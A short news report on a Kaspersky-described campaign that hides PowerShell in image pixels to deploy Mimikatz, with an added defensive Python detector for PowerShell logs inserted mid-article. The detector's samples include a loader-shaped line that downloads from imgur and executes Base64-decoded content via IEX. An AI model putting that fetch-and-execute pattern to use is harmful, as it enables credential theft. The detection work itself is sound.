May 30, 2020

The attacks begin with emails that are customized for each target, a researcher at security firm Kaspersky Lab reported this week.

Behind the scenes, however, a macro executes a PowerShell script.

The PowerShell script reaches out to either imgur.com or imgbox.com and downloads an image that has malicious code hidden inside the pixels through a technique called steganography.

The decrypted and decoded data is used as a second PowerShell script that, in turn, unpacks and decodes another blob of Base64-encoded data.

With that, a third obfuscated PowerShell script executes Mimikatz malware that’s designed to steal Windows account credentials used to access various network resources.

First, the malicious module is encoded in an image using steganographic techniques and the image is hosted on legitimate web resources.

This makes it virtually impossible to detect such malware using network traffic monitoring and control tools while it is being downloaded.

A second curious feature of the malware is the use of the exception message as the decryption key for the malicious payload.
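One way a defender could hunt for the chain described above in PowerShell script-block logs, as an added example that is not from the article or from Kaspersky's report: it scores a logged script block on the behaviours the article names (image-hosting domain, download, pixel access, Base64 decode, exception message reused as a key, in-memory execution). The PowerShell cmdlets and .NET member names are real; that such a loader would touch System.Drawing/GetPixel, and the sample blocks themselves, are constructed assumptions.

```python
import re

# Indicator patterns for the chain in the article. Cmdlet and .NET names are
# real; pixel access via System.Drawing/GetPixel is an assumption about how a
# pixel-stego loader would read the image, not something the article states.
INDICATORS = {
    "image_host": re.compile(r"imgur\.com|imgbox\.com", re.I),
    "download": re.compile(r"Net\.WebClient|Invoke-WebRequest|DownloadData|DownloadString", re.I),
    "pixel_access": re.compile(r"System\.Drawing|GetPixel|Bitmap", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "exception_key": re.compile(r"\.Exception\.Message", re.I),
    "in_memory_exec": re.compile(r"Invoke-Expression|\bIEX\b", re.I),
}

def score_script_block(script: str) -> list[str]:
    """Return the names of the indicators present in one script-block text."""
    return [name for name, rx in INDICATORS.items() if rx.search(script)]

def is_suspicious(script: str, threshold: int = 3) -> bool:
    """Flag a block that reaches an image host AND shows two more behaviours.

    Requiring the host plus supporting behaviours keeps an ordinary image
    download or an ordinary Base64 decode from firing on its own.
    """
    hits = score_script_block(script)
    return "image_host" in hits and len(hits) >= threshold

# Constructed sample script blocks (not captured samples). The first sketches
# the shape of the loader described in the article; $p is deliberately unset.
SAMPLES = {
    "stego_loader": (
        "$b=(New-Object Net.WebClient).DownloadData('https://imgur.com/EXAMPLE.png');"
        "$img=[System.Drawing.Bitmap]::FromStream([IO.MemoryStream]$b);"
        "try{[int]'x'}catch{$k=$_.Exception.Message};"
        "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($p)))"
    ),
    "benign_fetch": (
        "Invoke-WebRequest -Uri 'https://intranet.example/report.csv' -OutFile C:\\tmp\\r.csv"
    ),
    "benign_image": (
        "$img=[System.Drawing.Bitmap]::FromFile('C:\\photos\\a.png'); $img.Width"
    ),
}

if __name__ == "__main__":
    for name, block in SAMPLES.items():
        print(f"{name}: suspicious={is_suspicious(block)} hits={score_script_block(block)}")
```

Feed it the ScriptBlockText field of PowerShell event 4104 records; the threshold and pattern set are starting points to tune against your own baseline of administrative scripts.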

If the attackers are able to harvest the credentials of a contractor organization’s employees, this can lead to a range of negative consequences, from the theft of sensitive data to attacks on industrial enterprises via remote administration tools used by the contractor.
